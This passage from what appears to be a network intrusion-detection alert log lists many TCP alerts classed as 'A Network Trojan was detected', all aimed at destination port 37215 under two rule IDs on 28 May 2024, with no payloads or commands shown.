            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605633
            SID:2835222
            Source Port:37986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.407748
            SID:2835222
            Source Port:56748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857059
            SID:2829579
            Source Port:60706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020441
            SID:2835222
            Source Port:38890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.065895
            SID:2829579
            Source Port:33302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.143400
            SID:2835222
            Source Port:44086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.884939
            SID:2835222
            Source Port:56872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.737817
            SID:2835222
            Source Port:59504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.681547
            SID:2835222
            Source Port:44288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047384
            SID:2835222
            Source Port:34448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.813256
            SID:2835222
            Source Port:39626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.965845
            SID:2835222
            Source Port:59662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.966790
            SID:2835222
            Source Port:35442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.559075
            SID:2835222
            Source Port:46976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.948514
            SID:2829579
            Source Port:39150
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.445298
            SID:2835222
            Source Port:42400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.760155
            SID:2829579
            Source Port:42818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.855089
            SID:2835222
            Source Port:54400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.470820
            SID:2835222
            Source Port:46504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.685637
            SID:2835222
            Source Port:37080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.064948
            SID:2835222
            Source Port:60338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854721
            SID:2829579
            Source Port:44794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.563431
            SID:2829579
            Source Port:57802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.125912
            SID:2829579
            Source Port:50940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.941778
            SID:2835222
            Source Port:48628
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.376686
            SID:2835222
            Source Port:32988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.741961
            SID:2829579
            Source Port:59750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.636213
            SID:2835222
            Source Port:39890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.581979
            SID:2829579
            Source Port:60738
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.941092
            SID:2835222
            Source Port:50994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.020152
            SID:2829579
            Source Port:36228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.003007
            SID:2835222
            Source Port:37842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.694347
            SID:2829579
            Source Port:56234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.311196
            SID:2829579
            Source Port:59026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.573506
            SID:2829579
            Source Port:32872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.819821
            SID:2835222
            Source Port:37760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.929290
            SID:2835222
            Source Port:56598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.905965
            SID:2835222
            Source Port:42942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.732798
            SID:2835222
            Source Port:52098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.381961
            SID:2829579
            Source Port:46384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.814196
            SID:2829579
            Source Port:42978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.310830
            SID:2835222
            Source Port:41840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880418
            SID:2829579
            Source Port:49298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.944948
            SID:2835222
            Source Port:58020
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.956188
            SID:2829579
            Source Port:52332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.941956
            SID:2835222
            Source Port:39136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.945462
            SID:2829579
            Source Port:46618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.378544
            SID:2835222
            Source Port:34412
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.832544
            SID:2835222
            Source Port:47542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.463514
            SID:2829579
            Source Port:44714
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994600
            SID:2835222
            Source Port:50662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.312147
            SID:2835222
            Source Port:60824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.180676
            SID:2835222
            Source Port:47410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909825
            SID:2835222
            Source Port:51394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.953070
            SID:2829579
            Source Port:47228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.709580
            SID:2835222
            Source Port:39790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.038348
            SID:2829579
            Source Port:45170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.275441
            SID:2835222
            Source Port:45142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.687348
            SID:2829579
            Source Port:50742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.853212
            SID:2835222
            Source Port:54088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.542548
            SID:2829579
            Source Port:54928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880730
            SID:2829579
            Source Port:33456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910757
            SID:2835222
            Source Port:45054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.900065
            SID:2829579
            Source Port:59368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.009169
            SID:2835222
            Source Port:35874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.851073
            SID:2829579
            Source Port:40236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.857113
            SID:2829579
            Source Port:58520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.070701
            SID:2829579
            Source Port:41140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.681339
            SID:2829579
            Source Port:39998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.474018
            SID:2835222
            Source Port:38070
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809221
            SID:2835222
            Source Port:38276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.459639
            SID:2835222
            Source Port:59796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.717389
            SID:2835222
            Source Port:57570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.745952
            SID:2829579
            Source Port:49056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.431247
            SID:2835222
            Source Port:48210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857486
            SID:2829579
            Source Port:60800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.377035
            SID:2835222
            Source Port:45202
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869216
            SID:2835222
            Source Port:48704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031409
            SID:2829579
            Source Port:38848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.669325
            SID:2829579
            Source Port:45360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.423427
            SID:2829579
            Source Port:41320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735801
            SID:2835222
            Source Port:50390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.620632
            SID:2829579
            Source Port:39370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533807
            SID:2835222
            Source Port:51520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.809794
            SID:2829579
            Source Port:50674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777748
            SID:2835222
            Source Port:42304
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.562989
            SID:2835222
            Source Port:41922
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.999036
            SID:2835222
            Source Port:36624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.818291
            SID:2829579
            Source Port:52834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994709
            SID:2829579
            Source Port:48162
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.343046
            SID:2829579
            Source Port:50344
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.412890
            SID:2829579
            Source Port:48818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.905192
            SID:2835222
            Source Port:49264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.908606
            SID:2835222
            Source Port:53426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.928761
            SID:2829579
            Source Port:58956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280453
            SID:2829579
            Source Port:43086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.709889
            SID:2835222
            Source Port:37298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039250
            SID:2829579
            Source Port:59204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.760919
            SID:2835222
            Source Port:43128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.028261
            SID:2829579
            Source Port:58980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765538
            SID:2835222
            Source Port:48616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.986013
            SID:2835222
            Source Port:56430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.748179
            SID:2829579
            Source Port:34706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.350125
            SID:2829579
            Source Port:55846
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.459798
            SID:2835222
            Source Port:38794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.550067
            SID:2829579
            Source Port:51632
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.859367
            SID:2835222
            Source Port:56762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.634550
            SID:2829579
            Source Port:37174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.745881
            SID:2829579
            Source Port:57206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.938954
            SID:2835222
            Source Port:44590
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953503
            SID:2835222
            Source Port:37368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.730329
            SID:2829579
            Source Port:37910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809805
            SID:2829579
            Source Port:39430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.479287
            SID:2829579
            Source Port:50228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.665719
            SID:2835222
            Source Port:57232
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.581051
            SID:2835222
            Source Port:56438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.692919
            SID:2829579
            Source Port:48796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.540086
            SID:2835222
            Source Port:54008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.480356
            SID:2829579
            Source Port:44850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.984437
            SID:2835222
            Source Port:48504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.862158
            SID:2829579
            Source Port:48616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.568492
            SID:2835222
            Source Port:60648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.572182
            SID:2829579
            Source Port:52642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.357362
            SID:2835222
            Source Port:56318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.944246
            SID:2829579
            Source Port:33736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849812
            SID:2835222
            Source Port:57914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.277085
            SID:2829579
            Source Port:37630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.807211
            SID:2829579
            Source Port:39166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.334267
            SID:2829579
            Source Port:59576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.432509
            SID:2835222
            Source Port:47234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.055903
            SID:2835222
            Source Port:49094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.793529
            SID:2835222
            Source Port:53008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917557
            SID:2835222
            Source Port:40142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.775713
            SID:2829579
            Source Port:35714
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.067671
            SID:2829579
            Source Port:46122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.910099
            SID:2829579
            Source Port:45272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.881313
            SID:2829579
            Source Port:55980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.736148
            SID:2835222
            Source Port:49492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.775897
            SID:2829579
            Source Port:39326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.534122
            SID:2835222
            Source Port:55450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.776946
            SID:2829579
            Source Port:57982
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.955629
            SID:2835222
            Source Port:42038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.773896
            SID:2829579
            Source Port:46532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.298619
            SID:2835222
            Source Port:60966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.670825
            SID:2829579
            Source Port:44296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.977150
            SID:2835222
            Source Port:53116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.716173
            SID:2829579
            Source Port:46576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.944069
            SID:2835222
            Source Port:52416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.881906
            SID:2829579
            Source Port:59618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.358419
            SID:2835222
            Source Port:49442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.912041
            SID:2829579
            Source Port:43078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.432569
            SID:2829579
            Source Port:44730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.920307
            SID:2829579
            Source Port:48736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.457404
            SID:2835222
            Source Port:45070
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.065587
            SID:2829579
            Source Port:58562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777102
            SID:2829579
            Source Port:47604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.067339
            SID:2835222
            Source Port:34832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790573
            SID:2835222
            Source Port:44168
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.062007
            SID:2829579
            Source Port:47774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.868136
            SID:2829579
            Source Port:55658
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.944929
            SID:2829579
            Source Port:40098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.470636
            SID:2835222
            Source Port:45360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020303
            SID:2835222
            Source Port:43142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.778741
            SID:2829579
            Source Port:56332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.780633
            SID:2829579
            Source Port:39152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.331004
            SID:2835222
            Source Port:46494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887435
            SID:2829579
            Source Port:34248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.559153
            SID:2835222
            Source Port:49764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.997936
            SID:2829579
            Source Port:42498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.713490
            SID:2835222
            Source Port:39668
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.043009
            SID:2829579
            Source Port:42760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.552479
            SID:2835222
            Source Port:36166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.544312
            SID:2835222
            Source Port:55488
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.607386
            SID:2835222
            Source Port:38818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.422949
            SID:2835222
            Source Port:40530
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.444982
            SID:2829579
            Source Port:40120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.591616
            SID:2835222
            Source Port:43156
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.810719
            SID:2829579
            Source Port:45610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.064131
            SID:2829579
            Source Port:42962
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995642
            SID:2835222
            Source Port:35362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.855613
            SID:2835222
            Source Port:34738
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.437116
            SID:2835222
            Source Port:34788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.412764
            SID:2835222
            Source Port:38322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.675622
            SID:2829579
            Source Port:46342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818428
            SID:2835222
            Source Port:35978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.685351
            SID:2835222
            Source Port:53008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887674
            SID:2835222
            Source Port:32786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.299398
            SID:2835222
            Source Port:37696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.334147
            SID:2835222
            Source Port:38986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.811108
            SID:2829579
            Source Port:60766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.936233
            SID:2835222
            Source Port:56054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026831
            SID:2835222
            Source Port:44504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.851261
            SID:2835222
            Source Port:35354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.778417
            SID:2835222
            Source Port:41444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507197
            SID:2835222
            Source Port:58424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.665943
            SID:2829579
            Source Port:60516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.944080
            SID:2835222
            Source Port:45198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
